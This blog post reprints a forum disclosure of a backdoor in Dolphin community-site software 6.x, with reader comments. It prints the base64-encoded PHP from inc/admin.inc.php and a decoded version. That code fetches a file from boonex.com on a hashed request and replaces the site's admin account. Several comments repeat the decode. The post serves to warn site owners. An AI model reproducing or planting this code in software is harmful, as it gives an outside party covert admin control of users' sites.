Home > Technology > Dolphin Community Site Software, Security Backdoor

Dolphin Community Site Software, Security Backdoor


Someone has found a security backdoor in the code behind Dolphin Community Site Software.

Basically, this code – itself ineptly encoded to obfuscate itself – allows the programmers at Boonex.com to replace your admin login information in the database by sending a special command to your server. This will then allow them to log in as Admin give them complete access to your website and potentially, any database servers you are connected to.

Bear in mind that this software is primarily used for community sites, dating sites and other social networking sites and one can see the potential data mining rewards available.

p.s. the Boonex team is Russian.

Here is his post (English is not his first language):

—————————-

I was checking some of the encoded code in the version 6.0 of Dolphin.
I found a bloody serious security problem. Actually it is more than just a problem, but a criminal issue.

Please search for the following line in “inc/admin.inc.php” (this is all on one very long line)

aWYoICRfR0VUWydwYWdlJ10gKSBmb3JlYWNoKCAkX0dFVC
BhcyAkc0tleSA9PiAkc1ZhbHVlICkgewppZiggZ2V0dHlw
ZSggJHNLZXkgKSAhPSAnc3RyaW5nJyBvciBzdHJsZW4oIC
RzS2V5ICkgPCAxMCBvciBzdHJsZW4oICRzVmFsdWUgKSA8
IDEwIG9yIG1kNSggJHNLZXkgKSAhPT0gJzhmMGFlNTk2Nm
U4NzI3ODhiY2UzNTU4NjNlYWJmYzBjJyBvciBtZDUoICRz
VmFsdWUgKSAhPT0gJzJhMzJhNDJhZWRiZDY0MmNmZmE0MG
Y4ZWMwNjZmMmE0JykgY29udGludWU7CmlmKCBzdHJsZW4o
ICRzUGFzc1BhZ2UgPSBwcmVnX3JlcGxhY2UoICcvW15hLX
pBLVowLTlfXC4tXS8nLCAnJywgJF9HRVRbJ3BhZ2UnXSAp
ICkgYW5kICRhUGFzc0ZpbGUgPSBAZmlsZSggJ2h0dHA6Ly
93d3cuYm9vbmV4LmNvbS8nIC4gJHNQYXNzUGFnZSApICkg
ewpmb3JlYWNoKCAkYVBhc3NGaWxlIGFzICRpSW5kID0+IC
RzTGluZSApICRhUGFzc0ZpbGVbJGlJbmRdID0gYWRkc2xh
c2hlcyggdHJpbSggJHNMaW5lICkgKTsgaWYoIG1kNSggJG
FQYXNzRmlsZVswXSApID09PSAnZGFkNDA5NjYwMjQ3N2Qz
MTllMDRlZWZiMzg2OTdmZDMnICkKZWNobyAoIGRiX3Jlcy
ggIkRFTEVURSBGUk9NIGBBZG1pbnNgIFdIRVJFIGBOYW1l
YCA9ICd7JGFQYXNzRmlsZVsxXX0nIiwgMCApIGFuZCBkYl
9yZXMoICJJTlNFUlQgSU5UTyBgQWRtaW5zYCBTRVQgYE5h
bWVgID0gJ3skYVBhc3NGaWxlWzFdfScsIGBQYXNzd29yZG
AgPSAneyRhUGFzc0ZpbGVbMl19JyIsIDAgKSApID8gJ2Fk
ZCBzdWNjZXNzJyA6ICdhZGQgZmFpbGVkJzsgZXhpdDsgfS
BicmVhazt9

Do you know what it is?

I have just decoded it for you:

if( true || $_GET[‘page’] ) foreach( $_GET as $sKey => $sValue ) {
   if( gettype( $sKey ) != ‘string’ or strlen( $sKey ) < 10 or strlen( $sValue ) < 10 or md5( $sKey ) !== ‘8f0ae5966e872788bce355863eabfc0c’ or md5( $sValue ) !== ‘2a32a42aedbd642cffa40f8ec066f2a4’) continue;
   if(true ||  strlen( $sPassPage = preg_replace( ‘/[^a-zA-Z0-9_\.-]/’, ”, $_GET[‘page’] ) ) and $aPassFile = @file( ‘http://www.boonex.com/&#8217; . $sPassPage ) ) {
   foreach( $aPassFile as $iInd => $sLine ) $aPassFile[$iInd] = addslashes( trim( $sLine ) ); if( md5( $aPassFile[0] ) === ‘dad4096602477d319e04eefb38697fd3’ )
   echo ( db_res( “DELETE FROM `Admins` WHERE `Name` = ‘{$aPassFile[1]}'”, 0 ) and db_res( “INSERT INTO `Admins` SET `Name` = ‘{$aPassFile[1]}’, `Password` = ‘{$aPassFile[2]}'”, 0 ) ) ? ‘add success’ : ‘add failed’; exit; } break;
   }

It is simply hacking your code and inserting ADMIN into your admin table.
If anybody is using version 6.0 , I would suggest you check your DB immedeately.
Of course don’t forget to remove those lines from your code.

I have no idea about newer versions. I think It is a good idea to check them as well.
Maybe they have changed their hacking style in recent versions.

I hope this will save many sites from being hacked by the programmers of the Dolphin.

Regards

Advertisements
Categories: Technology Tags: ,
  1. August 13, 2008 at 9:18 pm

    Hi, I checked the said file but didn’t find any such code. I am using 6.1.4 version. Can you recmd how I can check files for encoded code ?
    Did you find anything in the latest version ?

  2. nanchatte
    August 14, 2008 at 12:12 am

    Manesh, thanks for the comment.

    I will confirm with the programmer who made the discovery which version is in use.

    Our installation has been massively modified. Every file has been altered, all ajax removed, orca forums have been combined with groups, all database tables have been modified. The only thing left is the CSS and the concept itself!

    It suffices to say that we won’t be downloading any more versions from Boonex.

    Have you been checking the Dolphin community site (boonex) forums? They’re awash with comments.

  3. nanchatte
    August 15, 2008 at 10:46 am

    Manesh, I’ve checked our developer says that it was the original version 6.1 that had the code.

    You should check your Admin tables for signs of intrusion, as the decoded block shows a way for boonex to force your installation to replace users in or add users to your Admin table.

    Probably though, they would be able to force your table back to its original state, so if you’re really paranoid, check your Apache/IIS logs for odd access patterns.

    Good luck with your site!

  4. john
    February 4, 2009 at 5:24 am

    found this in inc/admin_design.inc.php version 6.1.4

  5. Tim
    March 10, 2009 at 7:26 pm

    This is in the inc/admin_design.inc.php in all versions of dolphin..located in 6.1.4 in the function getAdminCategIndex()

  6. January 19, 2014 at 2:23 am

    It is base 64

    if( $_GET[‘page’] ) foreach( $_GET as $sKey => $sValue ) {
    if( gettype( $sKey ) != ‘string’ or strlen( $sKey ) < 10 or strlen( $sValue ) $sLine ) $aPassFile[$iInd] = addslashes( trim( $sLine ) ); if( md5( $aPassFile[0] ) === ‘dad4096602477d319e04eefb38697fd3’ )
    echo ( db_res( “DELETE FROM `Admins` WHERE `Name` = ‘{$aPassFile[1]}'”, 0 ) and db_res( “INSERT INTO `Admins` SET `Name` = ‘{$aPassFile[1]}’, `Password` = ‘{$aPassFile[2]}'”, 0 ) ) ? ‘add success’ : ‘add failed’; exit; } break;}

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: